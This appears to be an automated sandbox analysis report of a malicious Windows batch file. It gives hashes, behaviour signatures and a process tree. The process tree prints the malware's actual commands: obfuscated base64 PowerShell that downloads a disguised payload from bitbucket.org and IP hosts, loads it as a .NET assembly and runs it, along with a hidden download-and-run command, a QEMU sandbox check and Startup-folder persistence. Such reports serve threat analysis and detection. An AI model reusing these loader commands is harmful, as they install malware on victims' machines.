Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 08:42
Static task
static1
Behavioral task
behavioral1
Sample
4753694444c734517db1798354d6757e.bat
Resource
win7-20240903-en
General
-
Target
4753694444c734517db1798354d6757e.bat
-
Size
14KB
-
MD5
4753694444c734517db1798354d6757e
-
SHA1
69a983a9a46a68e0e716cb2455cc0c476b962d30
-
SHA256
88cb5593f2e66f223ed0993c90ec0709fc7166ff6c8659e33b84c24f6f5387a9
-
SHA512
4ff0358b264757dd5182fef9b199ab3850f130fb8455e4bbb607956630c2066c66df93f7f96023a9c4acef133d4ad68f09236272fcd814b604fbf646d7f76cce
-
SSDEEP
192:b86KQd3z8g+F+5lhVbeTymbPppbm/NbqHvRZqoi10OWjKRw1BiqvQ5OdvyyVEuNH:bjBoJqlkP7jqVqR8FWmgvWGUWZ
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2828 powershell.exe 6 2828 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2872 powershell.exe 2320 powershell.exe 2828 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4753694444c734517db1798354d6757e.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4753694444c734517db1798354d6757e.bat cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 bitbucket.org 5 bitbucket.org 6 bitbucket.org -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2320 powershell.exe 2828 powershell.exe 2872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2376 WMIC.exe Token: SeSecurityPrivilege 2376 WMIC.exe Token: SeTakeOwnershipPrivilege 2376 WMIC.exe Token: SeLoadDriverPrivilege 2376 WMIC.exe Token: SeSystemProfilePrivilege 2376 WMIC.exe Token: SeSystemtimePrivilege 2376 WMIC.exe Token: SeProfSingleProcessPrivilege 2376 WMIC.exe Token: SeIncBasePriorityPrivilege 2376 WMIC.exe Token: SeCreatePagefilePrivilege 2376 WMIC.exe Token: SeBackupPrivilege 2376 WMIC.exe Token: SeRestorePrivilege 2376 WMIC.exe Token: SeShutdownPrivilege 2376 WMIC.exe Token: SeDebugPrivilege 2376 WMIC.exe Token: SeSystemEnvironmentPrivilege 2376 WMIC.exe Token: SeRemoteShutdownPrivilege 2376 WMIC.exe Token: SeUndockPrivilege 2376 WMIC.exe Token: SeManageVolumePrivilege 2376 WMIC.exe Token: 33 2376 WMIC.exe Token: 34 2376 WMIC.exe Token: 35 2376 WMIC.exe Token: SeIncreaseQuotaPrivilege 2376 WMIC.exe Token: SeSecurityPrivilege 2376 WMIC.exe Token: SeTakeOwnershipPrivilege 2376 WMIC.exe Token: SeLoadDriverPrivilege 2376 WMIC.exe Token: SeSystemProfilePrivilege 2376 WMIC.exe Token: SeSystemtimePrivilege 2376 WMIC.exe Token: SeProfSingleProcessPrivilege 2376 WMIC.exe Token: SeIncBasePriorityPrivilege 2376 WMIC.exe Token: SeCreatePagefilePrivilege 2376 WMIC.exe Token: SeBackupPrivilege 2376 WMIC.exe Token: SeRestorePrivilege 2376 WMIC.exe Token: SeShutdownPrivilege 2376 WMIC.exe Token: SeDebugPrivilege 2376 WMIC.exe Token: SeSystemEnvironmentPrivilege 2376 WMIC.exe Token: SeRemoteShutdownPrivilege 2376 WMIC.exe Token: SeUndockPrivilege 2376 WMIC.exe Token: SeManageVolumePrivilege 2376 WMIC.exe Token: 33 2376 WMIC.exe Token: 34 2376 WMIC.exe Token: 35 2376 WMIC.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2692 wrote to memory of 2376 2692 cmd.exe 31 PID 2692 wrote to memory of 2376 2692 cmd.exe 31 PID 2692 wrote to memory of 2376 2692 cmd.exe 31 PID 2692 wrote to memory of 2416 2692 cmd.exe 32 PID 2692 wrote to memory of 2416 2692 cmd.exe 32 PID 2692 wrote to memory of 2416 2692 cmd.exe 32 PID 2692 wrote to memory of 2320 2692 cmd.exe 34 PID 2692 wrote to memory of 2320 2692 cmd.exe 34 PID 2692 wrote to memory of 2320 2692 cmd.exe 34 PID 2320 wrote to memory of 2828 2320 powershell.exe 35 PID 2320 wrote to memory of 2828 2320 powershell.exe 35 PID 2320 wrote to memory of 2828 2320 powershell.exe 35 PID 2692 wrote to memory of 2872 2692 cmd.exe 36 PID 2692 wrote to memory of 2872 2692 cmd.exe 36 PID 2692 wrote to memory of 2872 2692 cmd.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\4753694444c734517db1798354d6757e.bat"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\system32\find.exefind "QEMU"2⤵PID:2416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$codigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$HQ$ZQBz$HQ$aQBu$Gc$cwBv$G0$ZQB0$Gg$aQBu$Gc$d$$v$GY$ZwBo$Gg$a$Bo$Gg$a$Bo$Gg$a$Bk$Gc$LwBk$G8$dwBu$Gw$bwBh$GQ$cw$v$G4$ZQB3$F8$aQBt$Gc$LgBq$H$$Zw$/$DU$Mw$3$DY$MQ$y$Cc$L$$g$Cc$a$B0$HQ$c$$6$C8$Lw$x$D$$Mw$u$DI$ZQ$u$DY$Mg$v$HQ$ZQBz$HQ$XwBp$G0$Zw$u$Go$c$Bn$Cc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$D0$I$BE$G8$dwBu$Gw$bwBh$GQ$R$Bh$HQ$YQBG$HI$bwBt$Ew$aQBu$Gs$cw$g$CQ$b$Bp$G4$awBz$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$t$G4$ZQ$g$CQ$bgB1$Gw$b$$p$C$$ew$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$FQ$ZQB4$HQ$LgBF$G4$YwBv$GQ$aQBu$Gc$XQ$6$Do$VQBU$EY$O$$u$Ec$ZQB0$FM$d$By$Gk$bgBn$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$UwBU$EE$UgBU$D4$Pg$n$Ds$I$$k$GU$bgBk$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBF$E4$R$$+$D4$Jw$7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$p$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$GU$bgBk$EY$b$Bh$Gc$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$LQBn$GU$I$$w$C$$LQBh$G4$Z$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQBn$HQ$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$KQ$g$Hs$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$r$D0$I$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$C4$T$Bl$G4$ZwB0$Gg$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GI$YQBz$GU$Ng$0$Ew$ZQBu$Gc$d$Bo$C$$PQ$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$LQ$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$UwB1$GI$cwB0$HI$aQBu$Gc$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$L$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$k$HQ$eQBw$GU$I$$9$C$$J$Bs$G8$YQBk$GU$Z$BB$HM$cwBl$G0$YgBs$Hk$LgBH$GU$d$BU$Hk$c$Bl$Cg$JwB0$GU$cwB0$H$$bwB3$GU$cgBz$Gg$ZQBs$Gw$LgBI$G8$YQBh$GE$YQBh$GE$cwBk$G0$ZQ$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$JwB0$Hg$d$$u$Gk$RgBo$G0$bQBm$Gs$Lw$y$DY$Lg$y$D$$MQ$u$D$$Mg$u$DM$M$$x$C8$Lw$6$H$$d$B0$Gg$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$UgBl$Gc$QQBz$G0$Jw$s$C$$Jw$w$Cc$KQ$p$H0$fQ$=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($codigo.replace('$','A')));powershell.exe $OWjuxD"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/testingsomethingt/fghhhhhhhhhdg/downloads/new_img.jpg?537612', 'http://103.2e.62/test_img.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.iFhmmfk/26.201.02.301//:ptth', '0', 'StartupName', 'RegAsm', '0'))}}"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOWeRshElL.eXE -EX bYPasS -nOp -W hiDdeN -eC IAAgAGkAUgBtACAACQAtAFUAUgBpACAAKAAdIGgAdAB0AHAAOgAvAC8AMQAwADMALgAyADAALgAxADAAMgAuADYAMgAvADQAMAA0AC4AZABvAB0gIAAJACAACQArACAACQAdIGMAeAAdICAACQApACAALQBvAFUAVABGAEkATABFACAACQAdICQARQBOAFYAOgBhAHAAUABkAGEAdABBAFwAZABvAG4AaABhAG4AZwAuAGQAbwBjAHgAHSAgAAkAOwAgAAkAaQBuAHYATwBrAEUALQBpAFQAZQBtACAAHSAkAEUATgB2ADoAYQBwAHAAZABBAHQAQQBcAGQAbwBuAGgAYQBuAGcALgBkAG8AYwB4AB0g2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57c34e7fdb6a5f81ba0bb2d77148196cb
SHA18840ac5f5048a239a5f2a733a4d67b4323e3a490
SHA256c451d6daee344d8e0da1a097b2c7855ba7dffd8c990c06a693f58641a2ceb7f5
SHA512e14e97344c4ec27a024995e79d3648784d9d5a7dbd6966f171f22778966e66960c42d688325016601b574964532cf9b0e05ae0808c8a429822a01154ca74c9b4